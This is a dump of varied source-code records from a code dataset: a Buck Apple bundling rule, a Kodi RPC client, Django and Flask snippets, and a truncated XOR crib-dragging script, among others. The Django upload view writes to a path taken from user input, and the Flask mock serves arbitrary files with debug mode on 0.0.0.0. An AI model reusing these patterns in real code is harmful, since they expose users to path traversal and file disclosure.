(i.e. the image of the lens array is\n closest to the target image of the array the user requires.\n\n Parameters\n ----------\n target_image : float\n The deasired image of the lens array\n n : int\n The maximum number of lenses in the array. If unspecified by the\n user, it will be set to 4. Note: this does not take the xrt lens\n into account; however, there will always be at least 1 prefocus\n lens in the beam so we only need to worry about the tfs lens\n arrays.\n z_obj : float\n location of the lens object along the beam pipline in meters (m)\n \n Returns\n -------\n array\n Returns an array of lens combinations with the closest possible\n image to the target_image\n\n Note\n ----\n This mehtod does not currently take into account the case in which\n there is no tfs or xrt arrays.\n\n \"\"\"\n #create list of the image differences\n image_diff=[]\n #create list for the solutions with images closest to the target\n #image(i.e. with the lowest error\n closest_sols=[]\n \n #loop through all possible tfs/xrt combinations\n for combo in self.combinations:\n logger.debug(\"number of allowed lenses: %s\"%n)\n\n #check if the effective radius of the array is less than the tfs\n #safety limit and greater than the xrt safety limit\n #also check to see if the number of lenses in the array is less\n #than or equal to the efficiency limit\n #if it is more than n, the array is disregarded\n if combo.tfs.nlens<=n:\n if use_limits==True and combo.xrt.effective_radius>self.xrt_limit and combo.tfs.effective_radius \"artifact\":\n bundle_dir_name = get_bundle_dir_name(ctx)\n output = ctx.actions.declare_output(bundle_dir_name)\n return output\n\ndef assemble_bundle(ctx: \"context\", bundle: \"artifact\", parts: [AppleBundlePart.type], info_plist_part: [AppleBundlePart.type, None]) -> None:\n all_parts = parts + [info_plist_part] if info_plist_part else []\n spec_file = _bundle_spec_json(ctx, all_parts)\n\n tools = ctx.attrs._apple_tools[AppleToolsInfo]\n tool = tools.assemble_bundle\n\n codesign_args = []\n codesign_type = _detect_codesign_type(ctx)\n\n if codesign_type.value in [\"distribution\", \"adhoc\"]:\n codesign_args = [\n \"--codesign\",\n \"--codesign-tool\",\n ctx.attrs._apple_toolchain[AppleToolchainInfo].codesign,\n ]\n\n external_name = get_apple_sdk_name(ctx)\n platform_args = [\"--platform\", external_name]\n codesign_args.extend(platform_args)\n\n if codesign_type.value != \"adhoc\":\n provisioning_profiles = ctx.attrs._provisioning_profiles[DefaultInfo]\n expect(\n len(provisioning_profiles.default_outputs) == 1,\n \"expected exactly one default output from provisioning profile\",\n )\n provisioning_profiles_args = [\"--profiles-dir\"] + provisioning_profiles.default_outputs\n codesign_args.extend(provisioning_profiles_args)\n\n identities_command = ctx.attrs._apple_toolchain[AppleToolchainInfo].codesign_identities_command\n identities_command_args = [\"--codesign-identities-command\", cmd_args(identities_command)] if identities_command else []\n codesign_args.extend(identities_command_args)\n else:\n codesign_args.append(\"--ad-hoc\")\n\n codesign_args += _get_entitlements_codesign_args(ctx, codesign_type)\n\n info_plist_args = [\n \"--info-plist-source\",\n info_plist_part.source,\n \"--info-plist-destination\",\n get_apple_bundle_part_relative_destination_path(ctx, info_plist_part),\n ] if info_plist_part else []\n codesign_args.extend(info_plist_args)\n elif codesign_type.value == \"skip\":\n pass\n else:\n fail(\"Code sign type `{}` not supported\".format(codesign_type))\n\n command = cmd_args([\n tool,\n \"--output\",\n bundle.as_output(),\n \"--spec\",\n spec_file,\n ] + codesign_args)\n command.hidden([part.source for part in all_parts])\n run_incremental_args = {}\n incremental_state = ctx.actions.declare_output(\"incremental_state.json\").as_output()\n\n # Fallback to value from buckconfig\n incremental_bundling_enabled = ctx.attrs.incremental_bundling_enabled or ctx.attrs._incremental_bundling_enabled\n\n if incremental_bundling_enabled:\n command.add(\"--incremental-state\", incremental_state)\n run_incremental_args = {\n \"metadata_env_var\": \"ACTION_METADATA\",\n \"metadata_path\": \"action_metadata.json\",\n \"no_outputs_cleanup\": True,\n }\n category = \"apple_assemble_bundle_incremental\"\n else:\n # overwrite file with incremental state so if previous and next builds are incremental\n # (as opposed to the current non-incremental one), next one won't assume there is a\n # valid incremental state.\n command.hidden(ctx.actions.write_json(incremental_state, {}))\n category = \"apple_assemble_bundle\"\n\n if ctx.attrs._profile_bundling_enabled:\n profile_output = ctx.actions.declare_output(\"bundling_profile.txt\").as_output()\n command.add(\"--profile-output\", profile_output)\n\n if ctx.attrs._bundling_log_file_enabled:\n bundling_log_output = ctx.actions.declare_output(\"bundling_log.txt\").as_output()\n command.add(\"--log-file\", bundling_log_output)\n\n force_local_bundling = codesign_type.value != \"skip\"\n ctx.actions.run(\n command,\n local_only = force_local_bundling,\n prefer_local = not force_local_bundling,\n category = category,\n **run_incremental_args\n )\n\ndef get_bundle_dir_name(ctx: \"context\") -> str.type:\n return paths.replace_extension(get_product_name(ctx), \".\" + get_extension_attr(ctx))\n\ndef get_apple_bundle_part_relative_destination_path(ctx: \"context\", part: AppleBundlePart.type) -> str.type:\n bundle_relative_path = bundle_relative_path_for_destination(part.destination, get_apple_sdk_name(ctx), ctx.attrs.extension)\n destination_file_or_directory_name = part.new_name if part.new_name != None else paths.basename(part.source.short_path)\n return paths.join(bundle_relative_path, destination_file_or_directory_name)\n\n# Returns JSON to be passed into bundle assembling tool. It should contain a dictionary which maps bundle relative destination paths to source paths.\"\ndef _bundle_spec_json(ctx: \"context\", parts: [AppleBundlePart.type]) -> \"artifact\":\n specs = []\n\n for part in parts:\n part_spec = {\n \"dst\": get_apple_bundle_part_relative_destination_path(ctx, part),\n \"src\": part.source,\n }\n if part.codesign_on_copy:\n part_spec[\"codesign_on_copy\"] = True\n specs.append(part_spec)\n\n return ctx.actions.write_json(\"bundle_spec.json\", specs)\n\ndef _detect_codesign_type(ctx: \"context\") -> CodeSignType.type:\n if ctx.attrs.extension not in [\"app\", \"appex\"]:\n # Only code sign application bundles and extensions\n return CodeSignType(\"skip\")\n\n if ctx.attrs._codesign_type:\n return CodeSignType(ctx.attrs._codesign_type)\n sdk_name = get_apple_sdk_name(ctx)\n is_ad_hoc_sufficient = get_apple_sdk_metadata_for_sdk_name(sdk_name).is_ad_hoc_code_sign_sufficient\n return CodeSignType(\"adhoc\" if is_ad_hoc_sufficient else \"distribution\")\n\ndef _entitlements_file(ctx: \"context\") -> [\"artifact\", None]:\n if not ctx.attrs.binary:\n return None\n\n # The `binary` attribute can be either an apple_binary or a dynamic library from apple_library\n binary_entitlement_info = ctx.attrs.binary[AppleEntitlementsInfo]\n if binary_entitlement_info and binary_entitlement_info.entitlements_file:\n return binary_entitlement_info.entitlements_file\n\n return ctx.attrs._codesign_entitlements\n\ndef _should_include_entitlements(ctx: \"context\", codesign_type: CodeSignType.type) -> bool.type:\n if codesign_type.value == \"distribution\":\n return True\n\n if codesign_type.value == \"adhoc\":\n # The config-based override value takes priority over target value\n if ctx.attrs._use_entitlements_when_adhoc_code_signing != None:\n return ctx.attrs._use_entitlements_when_adhoc_code_signing\n return ctx.attrs.use_entitlements_when_adhoc_code_signing\n\n return False\n\ndef _get_entitlements_codesign_args(ctx: \"context\", codesign_type: CodeSignType.type) -> [\"_arglike\"]:\n include_entitlements = _should_include_entitlements(ctx, codesign_type)\n maybe_entitlements = _entitlements_file(ctx) if include_entitlements else None\n entitlements_args = [\"--entitlements\", maybe_entitlements] if maybe_entitlements else []\n return entitlements_args\n","sub_path":"buck-build/prelude/apple/apple_bundle_part.bzl","file_name":"apple_bundle_part.bzl","file_ext":"bzl","file_size_in_byte":8824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"322932452","text":"#!/usr/bin/env python\r\n#############################################################################\r\n#\r\n# Program : redate_ancil_dump.py\r\n# Author : Neil Massey\r\n# Date : 07/01/14\r\n# Purpose : Functions to redate ancil files or dumps (translated from IDL)\r\n# Modified: SS modified to redate day (21/02/2019)\r\n#############################################################################\r\n\r\nimport sys, os, getopt\r\nfrom read_um import *\r\nfrom write_ancil import write_ancil\r\nimport array\r\nimport numpy\r\n\r\n#############################################################################\r\n\r\ndef redate_dump_fixhdr(infile, outfile, day):\r\n # read the file as a binary file\r\n fh = open(infile, 'rb')\r\n fix_hdr = read_fixed_header(fh)\r\n pp_hdrs = read_pp_headers(fh, fix_hdr)\r\n intc = read_integer_constants(fh, fix_hdr)\r\n realc = read_real_constants(fh, fix_hdr)\r\n if fix_hdr[109] > 1:\r\n levc = read_level_constants(fh, fix_hdr)\r\n else:\r\n levc = numpy.zeros([0],'f')\r\n if fix_hdr[114] > 1:\r\n rowc = read_row_constants(fh, fix_hdr)\r\n else:\r\n rowc = numpy.zeros([0], 'f')\r\n \r\n fix_hdr[29] = day\r\n\r\n for i in range(0, fix_hdr[151]):\r\n pp_hdrs[i,2] = day\r\n pp_hdrs[i,8] = day \r\n # read all the data in\r\n data = read_data(fh, fix_hdr, intc, pp_hdrs)\r\n \r\n # write out the file\r\n write_ancil(outfile, fix_hdr, intc, realc, pp_hdrs, data, levc, rowc)\r\n fh.close()\r\n\r\n#############################################################################\r\n\r\nif __name__ == \"__main__\":\r\n opts, args = getopt.getopt(sys.argv[1:], 'i:o:d:', ['input==', 'output==', 'day=='])\r\n calendar = \"-1\"\r\n periodic = False\r\n dump = False\r\n strip_cm = False\r\n for opt, val in opts:\r\n if opt in ['--input=','--input', '-i']:\r\n infile = val\r\n if opt in ['--output=','--output', '-o']:\r\n outfile = val\r\n if opt in ['--day=','--day', '-d']:\r\n date = val\r\n try:\r\n day = int(date)\r\n except:\r\n print(\"Day in format dd\")\r\n sys.exit(0)\r\n\r\n redate_dump_fixhdr(infile, outfile, day)\r\n","sub_path":"redate_dump_fixhdr_day.py","file_name":"redate_dump_fixhdr_day.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"500352401","text":"from fb_post.models import Comment\nfrom fb_post.exceptions import InvalidCommentException\nfrom .validation import check_for_user, is_valid_reply_content\n\ndef reply_to_comment(user_id, comment_id, reply_content):\n try:\n check_for_user(user_id)\n\n comment = Comment.objects.select_related('parent_comment',\n 'post').get(id=comment_id)\n\n new_comment_id = comment_creation(user_id, comment_id,\n reply_content, comment)\n return new_comment_id\n\n except Comment.DoesNotExist:\n raise InvalidCommentException\n\ndef comment_creation(user_id, comment_id, reply_content, comment):\n if comment.parent_comment_id:\n parent_comment_id = comment.parent_comment_id\n is_valid_reply_content(reply_content)\n reply_id = Comment.objects.create(content=reply_content,\n commented_by_id=user_id,\n parent_comment_id=parent_comment_id,\n post_id=comment.post_id).id\n return reply_id\n\n comment_id = Comment.objects.create(content=reply_content,\n commented_by_id=user_id,\n parent_comment_id=comment_id,\n post_id=comment.post_id).id\n return comment_id\n","sub_path":"clean_code/clean_code_submissions/clean_code_assignment_004/fb_post/utils/.~c9_invoke_k5swzK.py","file_name":".~c9_invoke_k5swzK.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"257644069","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom django.http import HttpResponse, JsonResponse\n\nfrom users.models import Users\nimport os\n\n\ndef uploadCertification(request):\n image = request.FILES['name']\n print(image)\n print('uploadUserShot')\n type = request.POST.get('type')\n basedir = 'D:\\\\ProgramSoft\\\\Git\\\\Virtual-try-on\\\\FiRoom_backend\\\\static\\\\masterCertification\\\\'\n if not os.path.exists(basedir + type + '.jpg'):\n with open(basedir + type + '.jpg', 'wb') as f:\n f.write(image.read())\n f.close()\n return JsonResponse({'code': 0, 'data': '', 'msg': 'success'})","sub_path":"FiRoom_backend/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"74471485","text":"from socket import *\nfrom threading import Thread\n#模拟聊天室\n\ndef sentMsg():#发消息\n while True:\n sendData=input(\"<<\")\n udpSocket.sendto(sendData.encode(\"GB2312\"),(destIp,destPort))\n\ndef getMsg():#获取消息\n while True:\n recvData=udpSocket.recvfrom(1024)\n print(\"[%s]:%s\",str(recvData[1]),recvData[0].encode(\"GB2312\"))\n\nudpSocket=None\ndestIp=\"\"\ndestPort=0\n\ndef main():\n global udpSocket\n global destIp\n global destPort\n\n udpSocket = socket(AF_INET, SOCK_DGRAM)\n destIp = input(\"请输入对方Ip\")\n destPort = input(\"请输入对方的端口\")\n\n udpSocket.bind(('',6080))\n\n T_Sent=Thread(target=sentMsg)\n T_Get=Thread(target=getMsg)\n\n T_Sent.start()\n T_Get.start()\n\n T_Sent.join()\n T_Get.join()\n\n\nif __name__=='__main__':\n main()","sub_path":"demo/Talk_With_Eve.py","file_name":"Talk_With_Eve.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"72603260","text":"from datetime import datetime, timedelta\nfrom json import dumps as dictstr\nfrom logging import debug as log, warning as logw\n\nimport requests\nfrom singleton_decorator import singleton\n\n\n# JSON RPC API reference: https://kodi.wiki/view/JSON-RPC_API/v9\n\n\n@singleton\nclass KodiRpc:\n URL: str = \"http://localhost:8080/jsonrpc\"\n CACHE_VALID_TIME: int = 1200\n\n def __init__(self):\n self._channelList = {}\n self._playing = False\n self._paused = False\n self._broadcastsList = []\n log(\"KodiRpc: Created\")\n\n @classmethod\n def _liststr(cls, lst: list) -> str:\n retstr = '['\n for item in lst:\n retstr = retstr + '\"' + item + '\", '\n retstr = retstr[:-2]\n retstr = retstr + ']'\n return retstr\n\n @classmethod\n def _build_json(cls, method: str, request_id: str, params: dict = None) -> str:\n base = '{\"jsonrpc\": \"2.0\", '\n json = base + '\"method\": \"' + method + '\", \"id\": \"' + request_id + '\"'\n if params is not None and len(params) > 0:\n json = json + ', \"params\": {'\n for param, value in params.items():\n if isinstance(value, str):\n json = json + '\"' + param + '\": \"' + value + '\", '\n elif isinstance(value, dict):\n json = json + '\"' + param + '\": ' + dictstr(value) + \", \"\n elif isinstance(value, list):\n json = json + '\"' + param + '\": ' + cls._liststr(value) + \", \"\n else:\n json = json + '\"' + param + '\": ' + str(value) + ', '\n json = json[:-2]\n json = json + \"}\"\n json = json + \"}\"\n return json\n\n @classmethod\n def _get_tv_ch_groups(cls, request_id: str) -> list:\n log(\"KodiRpc: Getting all TV channel groups\")\n method = \"PVR.GetChannelGroups\"\n params = {\"channeltype\": \"tv\"}\n rpc_call = cls._build_json(method, request_id, params)\n response = requests.post(url=cls.URL, data=rpc_call)\n return response.json()['result']['channelgroups']\n\n @classmethod\n def _get_main_ch_group(cls, request_id: str) -> int:\n log(\"KodiRpc: Getting main channel group\")\n ch_groups = cls._get_tv_ch_groups(request_id)\n return ch_groups[0]['channelgroupid']\n\n @classmethod\n def _get_channels(cls, request_id: str) -> list:\n log(\"KodiRpc: Getting channels\")\n main_ch_group = cls._get_main_ch_group(\"chg\")\n method = \"PVR.GetChannels\"\n params = {\"channelgroupid\": main_ch_group}\n rpc_call = cls._build_json(method, request_id, params)\n response = requests.post(url=cls.URL, data=rpc_call)\n return response.json()['result']['channels']\n\n @classmethod\n def _play_channel(cls, request_id: str, channel_id: int) -> bool:\n log(\"KodiRpc: Playing channel \" + str(channel_id))\n rpc_call = cls._build_json(\"Player.Open\", request_id, {'item': {'channelid': channel_id}})\n response = requests.post(url=cls.URL, data=rpc_call)\n return response.json().get('result') == 'OK'\n\n def _get_channel_list(self) -> dict:\n log(\"KodiRpc: Getting channel list\")\n if len(self._channelList) > 0:\n return self._channelList\n else:\n log(\"KodiRpc: Caching channel list\")\n chs = self._get_channels(\"chs\")\n for ch in chs:\n if ch['label'][-3:] == ' HD':\n ch['label'] = ch['label'][:-3]\n if ch['label'].upper() not in self._channelList:\n self._channelList[ch['label'].upper()] = ch['channelid']\n return self._channelList\n\n def _get_channel_id_by_name(self, name: str) -> int:\n log(\"KodiRpc: Getting channel \" + name)\n if len(self._channelList) == 0:\n self._get_channel_list()\n return self._channelList.get(name)\n\n def _get_channel_broadcasts(self, name: str) -> list:\n log(\"KodiRpc: Getting broadcasts of \" + name)\n channel_id = self._get_channel_id_by_name(name)\n if channel_id is not None:\n rpc_call = self._build_json(\"PVR.GetBroadcasts\", \"gbrd\", {'channelid': channel_id,\n 'properties': ['starttime']})\n response = requests.post(url=self.URL, data=rpc_call).json()\n if response is None:\n logw(\"KodiRpc: Kodi has no broadcasts for this channel\")\n return []\n else:\n return response['result'].get('broadcasts')\n else:\n logw(\"KodiRpc: Channel does not exist\")\n return []\n\n def _get_next_broadcasts(self, name: str) -> list:\n log(\"KodiRpc: Getting next broadcasts of \" + name)\n broadcasts = self._get_channel_broadcasts(name)\n if broadcasts is not None:\n return list(filter(\n lambda x: datetime.strptime(x['starttime'], '%Y-%m-%d %H:%M:%S') >= datetime.now() - timedelta(days=1),\n broadcasts))\n else:\n return []\n\n def _get_all_next_broadcasts(self) -> list:\n log(\"KodiRpc: Getting all next broadcasts\")\n if len(self._channelList) == 0:\n self._get_channel_list()\n if len(self._broadcastsList) == 0:\n log(\"KodiRpc: Caching broadcasts...\")\n for ch in self._channelList:\n self._broadcastsList.extend(self._get_next_broadcasts(ch))\n else:\n self._broadcastsList = list(filter(\n lambda x: datetime.strptime(x['starttime'], '%Y-%m-%d %H:%M:%S') >= datetime.now(),\n self._broadcastsList))\n return self._broadcastsList\n\n def play_pause(self) -> bool:\n log(\"KodiRpc: Play/pause request\")\n rpc_call = self._build_json(\"Input.ExecuteAction\", \"plps\", {'action': 'playpause'})\n response = requests.post(url=self.URL, data=rpc_call).json()\n self._paused = not self._paused\n return response.get('result') == 'OK'\n\n def get_channel_names(self) -> list:\n log(\"KodiRpc: Getting channel names\")\n if len(self._channelList) == 0:\n self._get_channels(\"chs\")\n return list(self._channelList.keys())\n\n def play_channel(self, channel_name: str) -> bool:\n log(\"KodiRpc: Request to play \" + channel_name)\n channel_id = self._get_channel_id_by_name(channel_name.upper())\n if channel_id is None:\n logw(\"KodiRpc: Channel not found\")\n return False\n else:\n self._playing = True\n self._paused = False\n return self._play_channel(\"playch\", channel_id)\n\n def stop(self) -> bool:\n log(\"KodiRpc: Request to stop\")\n if not self._playing:\n logw(\"KodiRpc: Not playing anything\")\n return False\n else:\n rpc_call = self._build_json(\"Input.ExecuteAction\", \"stp\", {'action': 'stop'})\n response = requests.post(url=self.URL, data=rpc_call).json()\n if response.get('result') == 'OK':\n self._playing = False\n return True\n else:\n return False\n\n def get_next_time(self, name: str) -> datetime:\n log(\"KodiRpc: Getting next time schedule for \" + name)\n self._get_all_next_broadcasts()\n for br in self._broadcastsList:\n if br['label'].upper() == name.upper():\n return datetime.strptime(br['starttime'], '%Y-%m-%d %H:%M:%S')+timedelta(days=1)\n\n def is_playing(self):\n log(\"KodiRpc: Getting playing status\")\n return self._playing\n\n def is_paused(self):\n log(\"KodiRpc: Getting pause status\")\n return self._paused\n\nif __name__ == '__main__':\n print(KodiRpc().get_next_time('Cuarto Milenio'))","sub_path":"lib/kodiCtrl.py","file_name":"kodiCtrl.py","file_ext":"py","file_size_in_byte":7833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"258527908","text":"from django.core.mail import EmailMessage\nfrom django.conf import settings\n\ndef file_mail(bak_name, subject, email_from, email_to):\n '''发送附件'''\n email = EmailMessage(\n subject,\n 'Body goes here',\n email_from, # 发件人\n email_to, # 收件人\n headers={'Message-ID': 'foo'},\n )\n email.attach_file(bak_name, mimetype=None)\n email.send()","sub_path":"apps/graincentre/utils/sendmail.py","file_name":"sendmail.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"437516667","text":"\"\"\"\nCreated on Oct 31, 2014\n\n@author: Jay Atkinson\n\"\"\"\n\nimport sys\nsys.path.append(\"../\")\n\nimport unittest\nfrom copy import deepcopy\nfrom TestData import test_module, AnyXmlData\nfrom pyyen.yang.compiler.compiler import evaluate, tag_prefixes\nfrom pyyen.yang.parser.parser import parse\nfrom pyyen.yang.compiler.compiler_tree import initialize_tree\nfrom pyyen.yang.compiler.evaluate_anyxml import evaluate_anyxml, AnyXmlException\n\n\nclass EvaluteAnyXmlTest(unittest.TestCase):\n\n def test_anyxml_not_found(self):\n root = initialize_tree(parse(\n test_module,\n is_file=False))\n compiled = deepcopy(root)\n self.assertFalse(evaluate_anyxml(compiled))\n\n def test_anyxml_found(self):\n root = initialize_tree(parse(\n AnyXmlData.test_anyxml_module,\n is_file=False))\n compiled = deepcopy(root)\n self.assertTrue(evaluate_anyxml(compiled))\n\n def test_anyxml_toomany(self):\n root = initialize_tree(parse(\n AnyXmlData.test_anyxml_too_many,\n is_file=False))\n compiled = deepcopy(root)\n with self.assertRaises(AnyXmlException):\n evaluate_anyxml(compiled)\n\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"karan/workSpace/package/code_generation/pyyen/tests/test_EvaluateAnyXml.py","file_name":"test_EvaluateAnyXml.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"346486047","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n'''\nGraph algorhitms (depth-first and limited depth-first search) visualisation.\n\nBackend (application logic)\n\nBy K.Ivenkov \n03.2012\n'''\n\nclass Vertice(object):\n '''Holds a graph vertice with its' name and visual level'''\n\n def __init__(self, name = 'A', level = 0):\n self.name = name\n self.level = level\n\n\nclass Graph(object):\n '''\n Holds the graph vertice list and edge(tuple) list.\n Provides vertice/edge adding/removal interfaces.\n '''\n\n def __init__(self):\n self.vertices = []\n self.edges = []\n\n def get_vertice_by_name(self, name):\n '''\n Returns a graph vertice with a specified name or raises an exception\n '''\n for i in self.vertices:\n if i.name == name:\n return i\n else:\n raise Exception('Vertice not found!')\n\n def get_vertices_by_level(self, level):\n '''\n Returns all vertices from a selected level, sorted by name.\n A convenience method for graph UI display.\n '''\n return sorted(\n [v for v in self.vertices if v.level == level],\n key = lambda vert: vert.name\n )\n\n def add_vertice(self, name, level):\n '''\n Adds a vertice with the specified name and level to the graph\n '''\n for v in self.vertices:\n if v.name == name:\n raise Exception('This vertice already exists!')\n\n self.vertices.append(Vertice(name, level))\n\n def remove_vertice(self, obj):\n '''\n Removes a vertice with the specified name \n or a vertice object from the graph\n '''\n removable = self.get_vertice_by_name(obj) if type(obj) == str else obj\n\n removable_edges = [e for e in self.edges if removable in e]\n for re in removable_edges:\n self.edges.remove(re)\n\n self.vertices.remove(removable)\n \n def edit_vertice(self, obj, name = None, level = None):\n '''\n Edits a vertice with the specified name \n or a vertice object from the graph.\n If new name or level are not given the old ones are kept.\n ''' \n editable = self.get_vertice_by_name(obj) if type(obj) == str else obj \n editable_edges = [e for e in self.edges if editable in e]\n \n if name != None:\n for v in self.vertices:\n if v != editable and v.name == name:\n raise Exception('This vertice already exists!') \n newname = name\n else:\n newname = editable.name\n \n if level != None:\n newlevel = level\n else:\n newlevel = editable.level\n \n for ee in editable_edges:\n for eei in [ee[0], ee[1]]:\n if eei == editable:\n eei.name = newname\n eei.level = newlevel\n \n editable.name = newname\n editable.level = newlevel \n\n def add_edge(self, beginning, end):\n '''\n Adds an edge to the graph,\n connecting the vertices with the specified names\n '''\n for e in self.edges:\n if e[0].name == beginning and e[1].name == end:\n raise Exception('This edge already exists!')\n self.edges.append((\n self.get_vertice_by_name(beginning),\n self.get_vertice_by_name(end)\n ))\n\n def remove_edge(self, beginning, end):\n '''\n Removes an edge from the graph based on connected vertice names\n '''\n for e in self.edges:\n if e[0].name == beginning and e[1].name == end:\n self.edges.remove(e)\n break\n","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":3773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"141176472","text":"#coding: utf-8\nfrom django.shortcuts import render\nfrom django.http import JsonResponse, HttpResponseRedirect\n\nimport urllib, urllib2\n\ndef post_data(apis, args):\n result = ''\n error = ''\n base_apis = 'http://127.0.0.1:8080'\n data = urllib.urlencode(args)\n try:\n f = urllib2.urlopen(base_apis+apis, data)\n result = f.read()\n f.close()\n except:\n error = 'CANNOT connect to service: %s%s' % (base_apis, apis)\n return result, error\n\ndef index(request):\n result = ''\n error = ''\n if request.method == 'GET':\n if not request.GET:\n result = 'Welcome to public info. system!'\n elif 'args' in request.GET and 'apis' in request.GET:\n apis = request.GET['apis']\n args = request.GET['args']\n result, error = post_data(apis, {'data': args})\n else:\n error = 'CANNOT find key=data'\n else:\n error = 'ONLY handle GET request'\n\n return render(request, 'index.html', locals())\n","sub_path":"pscaffold/pweb/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"2620070","text":"'''\nInstall:\npip install flask\n\nRun with python CLI:\npython flask_mock_service.py\n\nNotes:\n- Method is default as GET\n'''\n\n\nimport os\n# import ipdb\nfrom flask import Flask, request, send_file, render_template\nimport json\nfrom time import sleep\n\napp = Flask(__name__)\n\n@app.route('/')\ndef hello_world():\n return 'Hello, World!'\n\n@app.route('/json', methods=['POST', 'GET'])\ndef test_json():\n sleep(0.2) # simulate network delay.\n return '{\"code\": 1, \"message\": \"Hello, World!\" }'\n\n# Request headers\n# http://flask.pocoo.org/docs/1.0/api/#flask.Request\n# https://werkzeug.palletsprojects.com/en/0.15.x/datastructures/#werkzeug.datastructures.Headers\n@app.route('/request_headers')\ndef test_req_headers():\n headers = request.headers\n \n # Get header values\n # get(key, default=None, type=None, as_bytes=False)\n # Return None if not found\n user_agent = headers.get('User-Agent')\n if user_agent is not None:\n return 'Header User-Agent in the request is %s.' % user_agent \n else:\n return 'Header User-Agent does not exist in the request.'\n\n# Request body content\n# http://flask.pocoo.org/docs/1.0/api/#flask.Request\n@app.route('/request_body', methods=['POST', 'GET'])\ndef test_req_body():\n # get_data(cache=True, as_text=False, parse_form_data=False)\n request_body = request.get_data()\n request_body = request_body.decode('utf-8') # decode if it is byte string b''\n return 'Request body content is\\n%s' % request_body\n \n # Output for request with '{\"key1\":\"value1\",\"key2\":2}':\n # Request body content is b'{\"key1\":\"value1\",\"key2\":2}'\n\n# Request body content as JSON \n# Parse and return the data as JSON. If the mimetype does not indicate JSON (application/json, see is_json), this returns None unless force is true. \n@app.route('/request_body_json', methods=['POST', 'GET'])\ndef test_req_body_json():\n # get_json(force=False, silent=False, cache=True)\n # Note: return is actually a dict\n \n # Note: is_json is changed to a property than a method.\n if request.is_json:\n return 'Request body content as json:\\n%s' % json.dumps(request.get_json(cache=False),indent=4)\n else:\n return r'Request has no header application/json.'\n\n@app.route('/request_body_force_json', methods=['POST', 'GET'])\ndef test_req_body_force_json():\n return 'Request body content forced as json:\\n%s' % json.dumps(request.get_json(force=True, cache=False),indent=4)\n '''Output example:\n Request body content forced as json:\n {\n \"key1\": \"value1\",\n \"key2\": 2\n }\n '''\n\n# get HTML form data https://www.w3schools.com/html/html_forms.asp\n'''Raw forma data request:\ncontent-type:\"multipart/form-data; boundary=--------------------------706175916610648661144841\"\ncontent-length:278\n\n----------------------------706175916610648661144841\nContent-Disposition: form-data; name=\"username\"\n\npeter\n----------------------------706175916610648661144841\nContent-Disposition: form-data; name=\"password\"\n\npwd\n----------------------------706175916610648661144841--\n'''\n@app.route('/request_form_data', methods=['POST', 'GET'])\ndef test_req_form_data():\n return 'Request body:\\n%s\\n%s' % (request.form[\"username\"],request.form[\"password\"])\n\n@app.route('/hello/')\n@app.route('/hello/')\ndef hello(name=None):\n return render_template('hello.html', name=name)\n\n# return a file\n# http://flask.pocoo.org/docs/1.0/api/#flask.send_file\n@app.route('/download_file', methods=['POST', 'GET'])\n@app.route('/download_file/', methods=['POST', 'GET'])\ndef test_download_file(file='pytest.ini'):\n try:\n # return send_file('report.zip', as_attachment = True, attachment_filename='report.zip') # zip file\n return send_file(file, as_attachment = True, attachment_filename=file) # any file\n except Exception as e:\n return str(e)\n \n# Run in HTTP \n# When debug = True, code is reloaded on the fly while saved\n# app.run(host='127.0.0.1', port='5000', debug=True) \napp.run(host='0.0.0.0', port='5000', debug=True) \n\n# Run in HTTPS\n# https://werkzeug.palletsprojects.com/en/0.15.x/serving/#quickstart\nssl_context_ = ('ssl_keys/key.crt', 'ssl_keys/key.key')\n# app.run(host='127.0.0.1', port='5000', ssl_context=ssl_context_)\n# output: Running on https://127.0.0.1:5001/\n","sub_path":"Scripts/flask_mock_service.py","file_name":"flask_mock_service.py","file_ext":"py","file_size_in_byte":4279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"221220613","text":"import sys\n\ndef run(text, blocksize, wordfile):\n\tfw = open(wordfile,\"r\")\n\twords = fw.read().split('\\n')\n\toffsets = setOffsets(words)\n\tfp = open(text, \"rb\")\n\tplaintext = fp.read()\n\tfw = open(\"out1.txt\", \"w\")\n\tfm = open(\"out2.txt\", \"w\")\n\tfor word in words:\n\t\tprint(word)\n\t\tmatch = traverse(word, words, plaintext, offsets)\n\t\tif match:\n\t\t\tfm.write(match)\n\t\t\tfw.write(word)\n\t\telse:\n\t\t\tfm.write('x' * len(word))\n\t\t\tfw.write('x' * len(word))\n\t\ndef setOffsets(words):\n\toffsets = []\n\toffsets.append(0)\n\tlength = len(words[0])\n\tfor i in range(0, len(words)):\n\t\tif length != len(words[i]):\n\t\t\toffsets.append(i)\n\t\t\tlength = len(words[i])\n\treturn offsets\n\ndef matchWord(c, word, words, offsets):\n\tlength = len(word)\n\tindex = 0\n\twhile len(words[offsets[index]]) != length:\n\t\tindex += 1\n\tstart = offsets[index]\n\tend = offsets[index+1]\n\tsublist = words[start:end]\n\tpWord = xorBytes(word, c).decode(\"utf8\")\n\tprint(pWord)\n\tif pWord in sublist:\n\t\treturn pWord\n\telse:\n\t\treturn None\n\ndef 